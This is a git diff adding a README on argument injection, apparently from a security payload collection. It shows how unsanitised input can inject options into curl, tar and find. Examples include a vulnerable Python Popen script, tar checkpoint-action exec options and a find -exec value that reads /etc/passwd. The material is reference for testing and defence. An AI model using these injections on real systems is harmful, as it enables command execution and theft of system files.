diff --git a/Argument Injection/README.md b/Argument Injection/README.md new file mode 100644 index 0000000..04f7ea1 --- /dev/null +++ b/Argument Injection/README.md @@ -0,0 +1,91 @@ +# Argument Injection +Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping. + +It can happen in different situations, where you can only inject arguments to a command: + +- Improper sanitization (regex) +- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen) +- Bash expansion (ex: *) + +In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: +``` +from shlex import quote,split +import sys +import subprocess + +if __name__=="__main__": + command = ['curl'] + command = command + split(sys.argv[1]) + print(command) + r = subprocess.Popen(command) +``` +It is possible for an attacker to pass several words to abuse options from ```curl``` command +``` +python python_rce.py "https://www.google.fr -o test.py" +``` +We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. +``` +['curl', 'https://www.google.fr', '-o', 'test.py'] +``` +## Summary + +* [List of exposed commands](#List of exposed commands) + * [TAR](#TAR) + * [CURL](#CURL) + * [WGET](#WGET) +* [References](#references) + + +## List of exposed commands + +### CURL +It is possible to abuse ```curl``` through the following options: + +``` + -o, --output Write to file instead of stdout + -O, --remote-name Write output to a file named as the remote file +``` +In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence. + +### TAR +For the ```tar``` command it is possible to inject arbitrary arguments in different commands. + +Argument injection can happen into the '''extract''' command: +``` +--to-command +--checkpoint=1 --checkpoint-action=exec= +-T or --files-from +``` + +Or in the '''create''' command: +``` +-I= or -I +--use-compres-program= +``` +There are also short options to work without spaces: +``` +-T +-I"/path/to/exec" +``` + +### FIND +Find some_file inside /tmp directory. +``` +$file = "some_file"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + +Print /etc/passwd content. +``` +$file = "sth -or -exec cat /etc/passwd ; -quit"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + + +## References + + +- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) +